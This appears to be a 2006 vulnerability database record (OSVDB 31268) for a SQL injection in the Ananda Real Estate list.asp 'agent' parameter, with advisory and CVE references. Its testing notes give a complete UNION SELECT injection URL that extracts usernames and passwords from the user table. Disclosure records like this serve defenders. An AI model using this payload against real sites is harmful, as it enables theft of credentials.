Ananda Real Estate list.asp agent Variable SQL Injection

2006-12-24T05:48:44
ID OSVDB:31268
Type osvdb
Reporter OSVDB
Modified 2006-12-24T05:48:44

Description

Manual Testing Notes

/list.asp?agent=-1%20union%20select%20username,0,0,0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20user%20where%20id%20like%201

References:

Secunia Advisory ID:23506 Other Advisory URL: http://milw0rm.com/exploits/3001 FrSIRT Advisory: ADV-2006-5179 CVE-2006-6807 Bugtraq ID: 21771